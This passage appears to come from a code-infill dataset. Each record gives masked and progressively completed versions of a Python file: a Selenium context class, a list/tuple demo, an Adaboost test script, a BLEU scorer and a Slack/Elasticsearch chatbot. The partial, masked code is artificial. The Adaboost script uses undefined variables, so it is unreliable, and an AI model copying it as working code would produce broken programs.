setOptionBeingHandled(self, option=None): self.optionBeingHandled = option SharedSeleniumExecutionContext.optionBeingHandled = option def setItemToDrag(self, item=None): self.itemToDrag = item SharedSeleniumExecutionContext.itemToDrag = item def initialize(self): if not SharedSeleniumExecutionContext.isInitialized and self.seleniumInstance: self.seleniumInstance.start() SharedSeleniumExecutionContext.isInitialized = True def destroy(self): if SharedSeleniumExecutionContext.isInitialized: SharedSeleniumExecutionContext.resetAll() def __del__(self): if self.isInitialized: self.seleniumInstance.stop() @staticmethod def resetAll(): if SharedSeleniumExecutionContext.isInitialized and SharedSeleniumExecutionContext.seleniumInstance: SharedSeleniumExecutionContext.seleniumInstance.stop() SharedSeleniumExecutionContext.host =None SharedSeleniumExecutionContext.port =None SharedSeleniumExecutionContext.browserStartCommand =None SharedSeleniumExecutionContext.url = None SharedSeleniumExecutionContext.seleniumInstance=None SharedSeleniumExecutionContext.isInitialized=False
normal
{ "blob_id": "e75fb023e2e3d3fd258a316a6827b2601c9f4b2d", "index": 3762, "step-1": "<mask token>\n\n\nclass SharedSeleniumExecutionContext:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def setHost(self, host):\n self.host = host\n SharedSeleniumExecutionContext.host = host\n SharedSeleniumExecutionContext.seleniumInstance.host = host\n <mask token>\n\n def setURL(self, url):\n self.url = url\n SharedSeleniumExecutionContext.url = url\n SharedSeleniumExecutionContext.seleniumInstance.browserURL = url\n\n def setLastVisitedLocation(self, location=None):\n self.lastVisitedLocation = location\n SharedSeleniumExecutionContext.lastVisitedLocation = location\n\n def setOptionBeingHandled(self, option=None):\n self.optionBeingHandled = option\n SharedSeleniumExecutionContext.optionBeingHandled = option\n\n def setItemToDrag(self, item=None):\n self.itemToDrag = item\n SharedSeleniumExecutionContext.itemToDrag = item\n\n def initialize(self):\n if (not SharedSeleniumExecutionContext.isInitialized and self.\n seleniumInstance):\n self.seleniumInstance.start()\n SharedSeleniumExecutionContext.isInitialized = True\n\n def destroy(self):\n if SharedSeleniumExecutionContext.isInitialized:\n SharedSeleniumExecutionContext.resetAll()\n <mask token>\n\n @staticmethod\n def resetAll():\n if (SharedSeleniumExecutionContext.isInitialized and\n SharedSeleniumExecutionContext.seleniumInstance):\n SharedSeleniumExecutionContext.seleniumInstance.stop()\n SharedSeleniumExecutionContext.host = None\n SharedSeleniumExecutionContext.port = None\n SharedSeleniumExecutionContext.browserStartCommand = None\n SharedSeleniumExecutionContext.url = None\n SharedSeleniumExecutionContext.seleniumInstance = None\n SharedSeleniumExecutionContext.isInitialized = False\n", "step-2": "<mask token>\n\n\nclass SharedSeleniumExecutionContext:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, host, port, browserStartCommand, url):\n if SharedSeleniumExecutionContext.seleniumInstance == None:\n SharedSeleniumExecutionContext.seleniumInstance = selenium(host,\n port, browserStartCommand, url)\n self.seleniumInstance = SharedSeleniumExecutionContext.seleniumInstance\n self.isInitialized = SharedSeleniumExecutionContext.isInitialized\n self.setBrowserStartCommand(browserStartCommand)\n self.setPort(port)\n self.setURL(url)\n self.setHost(host)\n self.setLastVisitedLocation()\n self.setOptionBeingHandled()\n self.setItemToDrag()\n <mask token>\n\n def setHost(self, host):\n self.host = host\n SharedSeleniumExecutionContext.host = host\n SharedSeleniumExecutionContext.seleniumInstance.host = host\n\n def setBrowserStartCommand(self, browserStartCommand):\n self.browserStartCommand = browserStartCommand\n SharedSeleniumExecutionContext.__browserStartCommand = (\n browserStartCommand)\n (SharedSeleniumExecutionContext.seleniumInstance.browserStartCommand\n ) = browserStartCommand\n\n def setURL(self, url):\n self.url = url\n SharedSeleniumExecutionContext.url = url\n SharedSeleniumExecutionContext.seleniumInstance.browserURL = url\n\n def setLastVisitedLocation(self, location=None):\n self.lastVisitedLocation = location\n SharedSeleniumExecutionContext.lastVisitedLocation = location\n\n def setOptionBeingHandled(self, option=None):\n self.optionBeingHandled = option\n SharedSeleniumExecutionContext.optionBeingHandled = option\n\n def setItemToDrag(self, item=None):\n self.itemToDrag = item\n SharedSeleniumExecutionContext.itemToDrag = item\n\n def initialize(self):\n if (not SharedSeleniumExecutionContext.isInitialized and self.\n seleniumInstance):\n self.seleniumInstance.start()\n SharedSeleniumExecutionContext.isInitialized = True\n\n def destroy(self):\n if SharedSeleniumExecutionContext.isInitialized:\n SharedSeleniumExecutionContext.resetAll()\n\n def __del__(self):\n if self.isInitialized:\n self.seleniumInstance.stop()\n\n @staticmethod\n def resetAll():\n if (SharedSeleniumExecutionContext.isInitialized and\n SharedSeleniumExecutionContext.seleniumInstance):\n SharedSeleniumExecutionContext.seleniumInstance.stop()\n SharedSeleniumExecutionContext.host = None\n SharedSeleniumExecutionContext.port = None\n SharedSeleniumExecutionContext.browserStartCommand = None\n SharedSeleniumExecutionContext.url = None\n SharedSeleniumExecutionContext.seleniumInstance = None\n SharedSeleniumExecutionContext.isInitialized = False\n", "step-3": "<mask token>\n\n\nclass SharedSeleniumExecutionContext:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, host, port, browserStartCommand, url):\n if SharedSeleniumExecutionContext.seleniumInstance == None:\n SharedSeleniumExecutionContext.seleniumInstance = selenium(host,\n port, browserStartCommand, url)\n self.seleniumInstance = SharedSeleniumExecutionContext.seleniumInstance\n self.isInitialized = SharedSeleniumExecutionContext.isInitialized\n self.setBrowserStartCommand(browserStartCommand)\n self.setPort(port)\n self.setURL(url)\n self.setHost(host)\n self.setLastVisitedLocation()\n self.setOptionBeingHandled()\n self.setItemToDrag()\n\n def setPort(self, port):\n self.port = port\n SharedSeleniumExecutionContext.port = port\n SharedSeleniumExecutionContext.seleniumInstance.port = port\n\n def setHost(self, host):\n self.host = host\n SharedSeleniumExecutionContext.host = host\n SharedSeleniumExecutionContext.seleniumInstance.host = host\n\n def setBrowserStartCommand(self, browserStartCommand):\n self.browserStartCommand = browserStartCommand\n SharedSeleniumExecutionContext.__browserStartCommand = (\n browserStartCommand)\n (SharedSeleniumExecutionContext.seleniumInstance.browserStartCommand\n ) = browserStartCommand\n\n def setURL(self, url):\n self.url = url\n SharedSeleniumExecutionContext.url = url\n SharedSeleniumExecutionContext.seleniumInstance.browserURL = url\n\n def setLastVisitedLocation(self, location=None):\n self.lastVisitedLocation = location\n SharedSeleniumExecutionContext.lastVisitedLocation = location\n\n def setOptionBeingHandled(self, option=None):\n self.optionBeingHandled = option\n SharedSeleniumExecutionContext.optionBeingHandled = option\n\n def setItemToDrag(self, item=None):\n self.itemToDrag = item\n SharedSeleniumExecutionContext.itemToDrag = item\n\n def initialize(self):\n if (not SharedSeleniumExecutionContext.isInitialized and self.\n seleniumInstance):\n self.seleniumInstance.start()\n SharedSeleniumExecutionContext.isInitialized = True\n\n def destroy(self):\n if SharedSeleniumExecutionContext.isInitialized:\n SharedSeleniumExecutionContext.resetAll()\n\n def __del__(self):\n if self.isInitialized:\n self.seleniumInstance.stop()\n\n @staticmethod\n def resetAll():\n if (SharedSeleniumExecutionContext.isInitialized and\n SharedSeleniumExecutionContext.seleniumInstance):\n SharedSeleniumExecutionContext.seleniumInstance.stop()\n SharedSeleniumExecutionContext.host = None\n SharedSeleniumExecutionContext.port = None\n SharedSeleniumExecutionContext.browserStartCommand = None\n SharedSeleniumExecutionContext.url = None\n SharedSeleniumExecutionContext.seleniumInstance = None\n SharedSeleniumExecutionContext.isInitialized = False\n", "step-4": "<mask token>\n\n\nclass SharedSeleniumExecutionContext:\n host = None\n port = None\n browserStartCommand = None\n url = None\n seleniumInstance = None\n isInitialized = False\n lastVisitedLocation = None\n optionBeingHandled = None\n itemToDrag = None\n\n def __init__(self, host, port, browserStartCommand, url):\n if SharedSeleniumExecutionContext.seleniumInstance == None:\n SharedSeleniumExecutionContext.seleniumInstance = selenium(host,\n port, browserStartCommand, url)\n self.seleniumInstance = SharedSeleniumExecutionContext.seleniumInstance\n self.isInitialized = SharedSeleniumExecutionContext.isInitialized\n self.setBrowserStartCommand(browserStartCommand)\n self.setPort(port)\n self.setURL(url)\n self.setHost(host)\n self.setLastVisitedLocation()\n self.setOptionBeingHandled()\n self.setItemToDrag()\n\n def setPort(self, port):\n self.port = port\n SharedSeleniumExecutionContext.port = port\n SharedSeleniumExecutionContext.seleniumInstance.port = port\n\n def setHost(self, host):\n self.host = host\n SharedSeleniumExecutionContext.host = host\n SharedSeleniumExecutionContext.seleniumInstance.host = host\n\n def setBrowserStartCommand(self, browserStartCommand):\n self.browserStartCommand = browserStartCommand\n SharedSeleniumExecutionContext.__browserStartCommand = (\n browserStartCommand)\n (SharedSeleniumExecutionContext.seleniumInstance.browserStartCommand\n ) = browserStartCommand\n\n def setURL(self, url):\n self.url = url\n SharedSeleniumExecutionContext.url = url\n SharedSeleniumExecutionContext.seleniumInstance.browserURL = url\n\n def setLastVisitedLocation(self, location=None):\n self.lastVisitedLocation = location\n SharedSeleniumExecutionContext.lastVisitedLocation = location\n\n def setOptionBeingHandled(self, option=None):\n self.optionBeingHandled = option\n SharedSeleniumExecutionContext.optionBeingHandled = option\n\n def setItemToDrag(self, item=None):\n self.itemToDrag = item\n SharedSeleniumExecutionContext.itemToDrag = item\n\n def initialize(self):\n if (not SharedSeleniumExecutionContext.isInitialized and self.\n seleniumInstance):\n self.seleniumInstance.start()\n SharedSeleniumExecutionContext.isInitialized = True\n\n def destroy(self):\n if SharedSeleniumExecutionContext.isInitialized:\n SharedSeleniumExecutionContext.resetAll()\n\n def __del__(self):\n if self.isInitialized:\n self.seleniumInstance.stop()\n\n @staticmethod\n def resetAll():\n if (SharedSeleniumExecutionContext.isInitialized and\n SharedSeleniumExecutionContext.seleniumInstance):\n SharedSeleniumExecutionContext.seleniumInstance.stop()\n SharedSeleniumExecutionContext.host = None\n SharedSeleniumExecutionContext.port = None\n SharedSeleniumExecutionContext.browserStartCommand = None\n SharedSeleniumExecutionContext.url = None\n SharedSeleniumExecutionContext.seleniumInstance = None\n SharedSeleniumExecutionContext.isInitialized = False\n", "step-5": "from selenium import selenium\n\nclass SharedSeleniumExecutionContext:\n \n host =None\n port =None\n browserStartCommand =None\n url = None\n seleniumInstance=None\n isInitialized=False\n lastVisitedLocation=None\n optionBeingHandled=None\n itemToDrag=None\n \n def __init__(self, host, port, browserStartCommand, url):\n if SharedSeleniumExecutionContext.seleniumInstance == None:\n SharedSeleniumExecutionContext.seleniumInstance = selenium(host, port, browserStartCommand, url)\n self.seleniumInstance = SharedSeleniumExecutionContext.seleniumInstance\n self.isInitialized = SharedSeleniumExecutionContext.isInitialized\n self.setBrowserStartCommand(browserStartCommand)\n self.setPort(port)\n self.setURL(url)\n self.setHost(host)\n self.setLastVisitedLocation()\n self.setOptionBeingHandled()\n self.setItemToDrag()\n \n def setPort(self, port):\n self.port = port\n SharedSeleniumExecutionContext.port = port\n SharedSeleniumExecutionContext.seleniumInstance.port = port\n \n def setHost(self, host):\n self.host = host\n SharedSeleniumExecutionContext.host= host\n SharedSeleniumExecutionContext.seleniumInstance.host = host\n \n def setBrowserStartCommand(self, browserStartCommand):\n self.browserStartCommand = browserStartCommand\n SharedSeleniumExecutionContext.__browserStartCommand = browserStartCommand\n SharedSeleniumExecutionContext.seleniumInstance.browserStartCommand = browserStartCommand\n \n def setURL(self, url):\n self.url = url\n SharedSeleniumExecutionContext.url = url\n SharedSeleniumExecutionContext.seleniumInstance.browserURL = url\n \n def setLastVisitedLocation(self, location=None):\n self.lastVisitedLocation = location\n SharedSeleniumExecutionContext.lastVisitedLocation = location\n \n def setOptionBeingHandled(self, option=None):\n self.optionBeingHandled = option\n SharedSeleniumExecutionContext.optionBeingHandled = option\n \n def setItemToDrag(self, item=None):\n self.itemToDrag = item\n SharedSeleniumExecutionContext.itemToDrag = item\n \n def initialize(self): \n if not SharedSeleniumExecutionContext.isInitialized and self.seleniumInstance:\n self.seleniumInstance.start()\n SharedSeleniumExecutionContext.isInitialized = True\n \n def destroy(self):\n if SharedSeleniumExecutionContext.isInitialized:\n SharedSeleniumExecutionContext.resetAll()\n \n def __del__(self): \n if self.isInitialized:\n self.seleniumInstance.stop()\n \n @staticmethod\n def resetAll():\n if SharedSeleniumExecutionContext.isInitialized and SharedSeleniumExecutionContext.seleniumInstance:\n SharedSeleniumExecutionContext.seleniumInstance.stop()\n\n SharedSeleniumExecutionContext.host =None\n SharedSeleniumExecutionContext.port =None\n SharedSeleniumExecutionContext.browserStartCommand =None\n SharedSeleniumExecutionContext.url = None\n SharedSeleniumExecutionContext.seleniumInstance=None\n SharedSeleniumExecutionContext.isInitialized=False", "step-ids": [ 9, 12, 13, 14, 16 ] }
[ 9, 12, 13, 14, 16 ]
new_tuple = (11,12,13,14,15,16,17) new_list = ['one' ,12,'three' ,14,'five'] print("Tuple: ",new_tuple) print("List: ", new_list) tuple_2= tuple (new_list) print("Converted tuple from the list : ", tuple_2)
normal
{ "blob_id": "889fdca3f92f218e6d6fd3d02d49483f16a64899", "index": 9117, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint('Tuple: ', new_tuple)\nprint('List: ', new_list)\n<mask token>\nprint('Converted tuple from the list : ', tuple_2)\n", "step-3": "new_tuple = 11, 12, 13, 14, 15, 16, 17\nnew_list = ['one', 12, 'three', 14, 'five']\nprint('Tuple: ', new_tuple)\nprint('List: ', new_list)\ntuple_2 = tuple(new_list)\nprint('Converted tuple from the list : ', tuple_2)\n", "step-4": "new_tuple = (11,12,13,14,15,16,17)\nnew_list = ['one' ,12,'three' ,14,'five'] \nprint(\"Tuple: \",new_tuple)\nprint(\"List: \", new_list)\ntuple_2= tuple (new_list)\nprint(\"Converted tuple from the list : \", tuple_2)", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#Alexis Langlois ''' Fichier de test pour l'algorithme Adaboost avec arbres de décision (@nbTrees). ''' import numpy as np from sklearn.utils import shuffle from sklearn.metrics import classification_report from sklearn.metrics import accuracy_score from adaboost_trees import AdaboostTrees #Trees nbTrees = 20 #Train dataset X = np.loadtxt('train_data') y = np.loadtxt('train_labels') X, y = shuffle(X, y) #Data normalization X -= X.min() X /= X.max() #Instanciation forest = AdaboostTrees(nbTrees) #Training forest.train(X, y) #Test dataset X = np.loadtxt('test_data') y = np.loadtxt('test_labels') X, y = shuffle(X, y) #Data normalization X -= X.min() X /= X.max() #Predictions predictions = forest.predict(X) #Report print classification_report(y, predicted) print 'Accuracy: ' + str(accuracy_score(tags, preds))
normal
{ "blob_id": "b750673829873c136826ae539900451559c042c8", "index": 5398, "step-1": "#Alexis Langlois\n'''\nFichier de test pour l'algorithme Adaboost avec arbres de décision (@nbTrees).\n'''\n\nimport numpy as np\n\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import accuracy_score\nfrom adaboost_trees import AdaboostTrees\n\n\n#Trees\nnbTrees = 20\n\n\n#Train dataset\nX = np.loadtxt('train_data')\ny = np.loadtxt('train_labels')\nX, y = shuffle(X, y)\n\n\n#Data normalization\nX -= X.min()\nX /= X.max()\n\n\n#Instanciation\nforest = AdaboostTrees(nbTrees)\n\n\n#Training\nforest.train(X, y)\n\n\n#Test dataset\nX = np.loadtxt('test_data')\ny = np.loadtxt('test_labels')\nX, y = shuffle(X, y)\n\n\n#Data normalization\nX -= X.min()\nX /= X.max()\n\n\n#Predictions\npredictions = forest.predict(X)\n\n\n#Report\nprint classification_report(y, predicted)\nprint 'Accuracy: ' + str(accuracy_score(tags, preds))", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
import thumt.utils.bleu as bleu import argparse parser = argparse.ArgumentParser("Compute sentence bleu.") parser.add_argument("-pred_path", type=str, required=True) parser.add_argument("-n_list_path", type=str, required=True) parser.add_argument("-refer_path", type=str, required=True) args = parser.parse_args() n_list = [] with open(args.pred_path, 'r') as f: preds = f.readlines() with open(args.n_list_path, 'r') as f: for line in f: n_list.append(int(line.strip())) with open(args.refer_path, 'r') as f: golds = f.readlines() f_summary = open(args.pred_path + ".sent-bleu", 'w') gold_idx = 0 for idx, pred in enumerate(preds): #import ipdb; ipdb.set_trace() if idx == sum(n_list[:gold_idx + 1]): gold_idx += 1 gold = golds[gold_idx].strip() # remove `\n` #refs = [gold.split()] refs = [[gold.split()]] pred = [pred.strip().split()] #import ipdb; ipdb.set_trace() sent_bleu = bleu.bleu(pred, refs, smooth=True) print("%s : %s : %f" % (pred, refs, sent_bleu)) f_summary.write(" ".join(pred[0]) + "|||" + str(sent_bleu) + "\n") f_summary.close()
normal
{ "blob_id": "4437075901751adeaf3df63345e270a9b0090c14", "index": 1918, "step-1": "<mask token>\n", "step-2": "<mask token>\nparser.add_argument('-pred_path', type=str, required=True)\nparser.add_argument('-n_list_path', type=str, required=True)\nparser.add_argument('-refer_path', type=str, required=True)\n<mask token>\nwith open(args.pred_path, 'r') as f:\n preds = f.readlines()\nwith open(args.n_list_path, 'r') as f:\n for line in f:\n n_list.append(int(line.strip()))\nwith open(args.refer_path, 'r') as f:\n golds = f.readlines()\n<mask token>\nfor idx, pred in enumerate(preds):\n if idx == sum(n_list[:gold_idx + 1]):\n gold_idx += 1\n gold = golds[gold_idx].strip()\n refs = [[gold.split()]]\n pred = [pred.strip().split()]\n sent_bleu = bleu.bleu(pred, refs, smooth=True)\n print('%s : %s : %f' % (pred, refs, sent_bleu))\n f_summary.write(' '.join(pred[0]) + '|||' + str(sent_bleu) + '\\n')\nf_summary.close()\n", "step-3": "<mask token>\nparser = argparse.ArgumentParser('Compute sentence bleu.')\nparser.add_argument('-pred_path', type=str, required=True)\nparser.add_argument('-n_list_path', type=str, required=True)\nparser.add_argument('-refer_path', type=str, required=True)\nargs = parser.parse_args()\nn_list = []\nwith open(args.pred_path, 'r') as f:\n preds = f.readlines()\nwith open(args.n_list_path, 'r') as f:\n for line in f:\n n_list.append(int(line.strip()))\nwith open(args.refer_path, 'r') as f:\n golds = f.readlines()\nf_summary = open(args.pred_path + '.sent-bleu', 'w')\ngold_idx = 0\nfor idx, pred in enumerate(preds):\n if idx == sum(n_list[:gold_idx + 1]):\n gold_idx += 1\n gold = golds[gold_idx].strip()\n refs = [[gold.split()]]\n pred = [pred.strip().split()]\n sent_bleu = bleu.bleu(pred, refs, smooth=True)\n print('%s : %s : %f' % (pred, refs, sent_bleu))\n f_summary.write(' '.join(pred[0]) + '|||' + str(sent_bleu) + '\\n')\nf_summary.close()\n", "step-4": "import thumt.utils.bleu as bleu\nimport argparse\nparser = argparse.ArgumentParser('Compute sentence bleu.')\nparser.add_argument('-pred_path', type=str, required=True)\nparser.add_argument('-n_list_path', type=str, required=True)\nparser.add_argument('-refer_path', type=str, required=True)\nargs = parser.parse_args()\nn_list = []\nwith open(args.pred_path, 'r') as f:\n preds = f.readlines()\nwith open(args.n_list_path, 'r') as f:\n for line in f:\n n_list.append(int(line.strip()))\nwith open(args.refer_path, 'r') as f:\n golds = f.readlines()\nf_summary = open(args.pred_path + '.sent-bleu', 'w')\ngold_idx = 0\nfor idx, pred in enumerate(preds):\n if idx == sum(n_list[:gold_idx + 1]):\n gold_idx += 1\n gold = golds[gold_idx].strip()\n refs = [[gold.split()]]\n pred = [pred.strip().split()]\n sent_bleu = bleu.bleu(pred, refs, smooth=True)\n print('%s : %s : %f' % (pred, refs, sent_bleu))\n f_summary.write(' '.join(pred[0]) + '|||' + str(sent_bleu) + '\\n')\nf_summary.close()\n", "step-5": "import thumt.utils.bleu as bleu\nimport argparse\n\nparser = argparse.ArgumentParser(\"Compute sentence bleu.\")\nparser.add_argument(\"-pred_path\", type=str, required=True)\nparser.add_argument(\"-n_list_path\", type=str, required=True)\nparser.add_argument(\"-refer_path\", type=str, required=True)\n\nargs = parser.parse_args()\n\nn_list = []\nwith open(args.pred_path, 'r') as f:\n\tpreds = f.readlines()\nwith open(args.n_list_path, 'r') as f:\n for line in f:\n n_list.append(int(line.strip()))\n\nwith open(args.refer_path, 'r') as f:\n\tgolds = f.readlines()\n\nf_summary = open(args.pred_path + \".sent-bleu\", 'w')\ngold_idx = 0\nfor idx, pred in enumerate(preds):\n #import ipdb; ipdb.set_trace()\n if idx == sum(n_list[:gold_idx + 1]):\n gold_idx += 1\n\n gold = golds[gold_idx].strip()\t# remove `\\n`\n\t#refs = [gold.split()]\n refs = [[gold.split()]]\n pred = [pred.strip().split()]\n #import ipdb; ipdb.set_trace()\n sent_bleu = bleu.bleu(pred, refs, smooth=True)\n print(\"%s : %s : %f\" % (pred, refs, sent_bleu))\n f_summary.write(\" \".join(pred[0]) + \"|||\" + str(sent_bleu) + \"\\n\")\nf_summary.close()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import os import time import pickle from configparser import ConfigParser from slackbot import bot from slackbot.bot import Bot from slackbot.bot import listen_to from elasticsearch_dsl.connections import connections from okcom_tokenizer.tokenizers import CCEmojiJieba, UniGram from marginalbear_elastic.query import post_multifield_query from marginalbear_elastic.utils import concat_tokens from marginalbear_elastic.ranking import avg_pmi top_title = 100 top_response = 15 package_dir = os.path.dirname(os.path.realpath(__name__)) config = ConfigParser() config.read(package_dir + '/chatbot_apps/config.ini') bot.settings.API_TOKEN = config.get('slack', 'slack_token') SLACK_CHANNEL = config.get('slack', 'slack_channel') @listen_to(r'(.*)') def receive_question(message, question_string): if message._body['channel'] == SLACK_CHANNEL: try: query_ccjieba = ccjieba.cut(question_string.strip()) query_unigram = unigram.cut(question_string.strip()) results = post_multifield_query(client, index='post', query_ccjieba=concat_tokens(query_ccjieba, pos=False), query_unigram=concat_tokens(query_unigram, pos=False), top=top_title) ans = avg_pmi(query_unigram, results, pairs_cnt, total_pairs_cnt, tokenizer='unigram') ans_string = '\n'.join(['<{:.3f}> <title:{}> comment: {}'.format(score, title, comment) for score, comment, title in ans[:top_response]]) message.send(ans_string) except Exception as err: print(err) def main(): bot = Bot() bot.run() if __name__ == '__main__': client = connections.create_connection() ccjieba = CCEmojiJieba() unigram = UniGram() t = time.time() print('Loading unigram pmi pickle') with open(package_dir + '/data/pmi_pickle/pmi_unigram.pickle', 'rb') as f: pairs_cnt = dict(pickle.load(f)) total_pairs_cnt = sum(pairs_cnt.values()) print('Pickle loaded in {:.5f}s'.format(time.time() - t)) main()
normal
{ "blob_id": "3630f83e7e6a10f42e96f8bd6fa9714232d9176b", "index": 4552, "step-1": "<mask token>\n\n\n@listen_to('(.*)')\ndef receive_question(message, question_string):\n if message._body['channel'] == SLACK_CHANNEL:\n try:\n query_ccjieba = ccjieba.cut(question_string.strip())\n query_unigram = unigram.cut(question_string.strip())\n results = post_multifield_query(client, index='post',\n query_ccjieba=concat_tokens(query_ccjieba, pos=False),\n query_unigram=concat_tokens(query_unigram, pos=False), top=\n top_title)\n ans = avg_pmi(query_unigram, results, pairs_cnt,\n total_pairs_cnt, tokenizer='unigram')\n ans_string = '\\n'.join(['<{:.3f}> <title:{}> comment: {}'.\n format(score, title, comment) for score, comment, title in\n ans[:top_response]])\n message.send(ans_string)\n except Exception as err:\n print(err)\n\n\ndef main():\n bot = Bot()\n bot.run()\n\n\n<mask token>\n", "step-2": "<mask token>\nconfig.read(package_dir + '/chatbot_apps/config.ini')\n<mask token>\n\n\n@listen_to('(.*)')\ndef receive_question(message, question_string):\n if message._body['channel'] == SLACK_CHANNEL:\n try:\n query_ccjieba = ccjieba.cut(question_string.strip())\n query_unigram = unigram.cut(question_string.strip())\n results = post_multifield_query(client, index='post',\n query_ccjieba=concat_tokens(query_ccjieba, pos=False),\n query_unigram=concat_tokens(query_unigram, pos=False), top=\n top_title)\n ans = avg_pmi(query_unigram, results, pairs_cnt,\n total_pairs_cnt, tokenizer='unigram')\n ans_string = '\\n'.join(['<{:.3f}> <title:{}> comment: {}'.\n format(score, title, comment) for score, comment, title in\n ans[:top_response]])\n message.send(ans_string)\n except Exception as err:\n print(err)\n\n\ndef main():\n bot = Bot()\n bot.run()\n\n\nif __name__ == '__main__':\n client = connections.create_connection()\n ccjieba = CCEmojiJieba()\n unigram = UniGram()\n t = time.time()\n print('Loading unigram pmi pickle')\n with open(package_dir + '/data/pmi_pickle/pmi_unigram.pickle', 'rb') as f:\n pairs_cnt = dict(pickle.load(f))\n total_pairs_cnt = sum(pairs_cnt.values())\n print('Pickle loaded in {:.5f}s'.format(time.time() - t))\n main()\n", "step-3": "<mask token>\ntop_title = 100\ntop_response = 15\npackage_dir = os.path.dirname(os.path.realpath(__name__))\nconfig = ConfigParser()\nconfig.read(package_dir + '/chatbot_apps/config.ini')\nbot.settings.API_TOKEN = config.get('slack', 'slack_token')\nSLACK_CHANNEL = config.get('slack', 'slack_channel')\n\n\n@listen_to('(.*)')\ndef receive_question(message, question_string):\n if message._body['channel'] == SLACK_CHANNEL:\n try:\n query_ccjieba = ccjieba.cut(question_string.strip())\n query_unigram = unigram.cut(question_string.strip())\n results = post_multifield_query(client, index='post',\n query_ccjieba=concat_tokens(query_ccjieba, pos=False),\n query_unigram=concat_tokens(query_unigram, pos=False), top=\n top_title)\n ans = avg_pmi(query_unigram, results, pairs_cnt,\n total_pairs_cnt, tokenizer='unigram')\n ans_string = '\\n'.join(['<{:.3f}> <title:{}> comment: {}'.\n format(score, title, comment) for score, comment, title in\n ans[:top_response]])\n message.send(ans_string)\n except Exception as err:\n print(err)\n\n\ndef main():\n bot = Bot()\n bot.run()\n\n\nif __name__ == '__main__':\n client = connections.create_connection()\n ccjieba = CCEmojiJieba()\n unigram = UniGram()\n t = time.time()\n print('Loading unigram pmi pickle')\n with open(package_dir + '/data/pmi_pickle/pmi_unigram.pickle', 'rb') as f:\n pairs_cnt = dict(pickle.load(f))\n total_pairs_cnt = sum(pairs_cnt.values())\n print('Pickle loaded in {:.5f}s'.format(time.time() - t))\n main()\n", "step-4": "import os\nimport time\nimport pickle\nfrom configparser import ConfigParser\nfrom slackbot import bot\nfrom slackbot.bot import Bot\nfrom slackbot.bot import listen_to\nfrom elasticsearch_dsl.connections import connections\nfrom okcom_tokenizer.tokenizers import CCEmojiJieba, UniGram\nfrom marginalbear_elastic.query import post_multifield_query\nfrom marginalbear_elastic.utils import concat_tokens\nfrom marginalbear_elastic.ranking import avg_pmi\ntop_title = 100\ntop_response = 15\npackage_dir = os.path.dirname(os.path.realpath(__name__))\nconfig = ConfigParser()\nconfig.read(package_dir + '/chatbot_apps/config.ini')\nbot.settings.API_TOKEN = config.get('slack', 'slack_token')\nSLACK_CHANNEL = config.get('slack', 'slack_channel')\n\n\n@listen_to('(.*)')\ndef receive_question(message, question_string):\n if message._body['channel'] == SLACK_CHANNEL:\n try:\n query_ccjieba = ccjieba.cut(question_string.strip())\n query_unigram = unigram.cut(question_string.strip())\n results = post_multifield_query(client, index='post',\n query_ccjieba=concat_tokens(query_ccjieba, pos=False),\n query_unigram=concat_tokens(query_unigram, pos=False), top=\n top_title)\n ans = avg_pmi(query_unigram, results, pairs_cnt,\n total_pairs_cnt, tokenizer='unigram')\n ans_string = '\\n'.join(['<{:.3f}> <title:{}> comment: {}'.\n format(score, title, comment) for score, comment, title in\n ans[:top_response]])\n message.send(ans_string)\n except Exception as err:\n print(err)\n\n\ndef main():\n bot = Bot()\n bot.run()\n\n\nif __name__ == '__main__':\n client = connections.create_connection()\n ccjieba = CCEmojiJieba()\n unigram = UniGram()\n t = time.time()\n print('Loading unigram pmi pickle')\n with open(package_dir + '/data/pmi_pickle/pmi_unigram.pickle', 'rb') as f:\n pairs_cnt = dict(pickle.load(f))\n total_pairs_cnt = sum(pairs_cnt.values())\n print('Pickle loaded in {:.5f}s'.format(time.time() - t))\n main()\n", "step-5": "import os\nimport time\nimport pickle\nfrom configparser import ConfigParser\n\nfrom slackbot import bot\nfrom slackbot.bot import Bot\nfrom slackbot.bot import listen_to\nfrom elasticsearch_dsl.connections import connections\n\nfrom okcom_tokenizer.tokenizers import CCEmojiJieba, UniGram\nfrom marginalbear_elastic.query import post_multifield_query\nfrom marginalbear_elastic.utils import concat_tokens\nfrom marginalbear_elastic.ranking import avg_pmi\n\n\ntop_title = 100\ntop_response = 15\n\npackage_dir = os.path.dirname(os.path.realpath(__name__))\nconfig = ConfigParser()\nconfig.read(package_dir + '/chatbot_apps/config.ini')\nbot.settings.API_TOKEN = config.get('slack', 'slack_token')\nSLACK_CHANNEL = config.get('slack', 'slack_channel')\n\n\n@listen_to(r'(.*)')\ndef receive_question(message, question_string):\n if message._body['channel'] == SLACK_CHANNEL:\n try:\n query_ccjieba = ccjieba.cut(question_string.strip())\n query_unigram = unigram.cut(question_string.strip())\n results = post_multifield_query(client,\n index='post',\n query_ccjieba=concat_tokens(query_ccjieba, pos=False),\n query_unigram=concat_tokens(query_unigram, pos=False),\n top=top_title)\n ans = avg_pmi(query_unigram, results, pairs_cnt, total_pairs_cnt, tokenizer='unigram')\n ans_string = '\\n'.join(['<{:.3f}> <title:{}> comment: {}'.format(score, title, comment) for score, comment, title in ans[:top_response]])\n message.send(ans_string)\n except Exception as err:\n print(err)\n\n\ndef main():\n bot = Bot()\n bot.run()\n\n\nif __name__ == '__main__':\n client = connections.create_connection()\n ccjieba = CCEmojiJieba()\n unigram = UniGram()\n t = time.time()\n print('Loading unigram pmi pickle')\n with open(package_dir + '/data/pmi_pickle/pmi_unigram.pickle', 'rb') as f:\n pairs_cnt = dict(pickle.load(f))\n total_pairs_cnt = sum(pairs_cnt.values())\n print('Pickle loaded in {:.5f}s'.format(time.time() - t))\n main()\n", "step-ids": [ 2, 3, 4, 5, 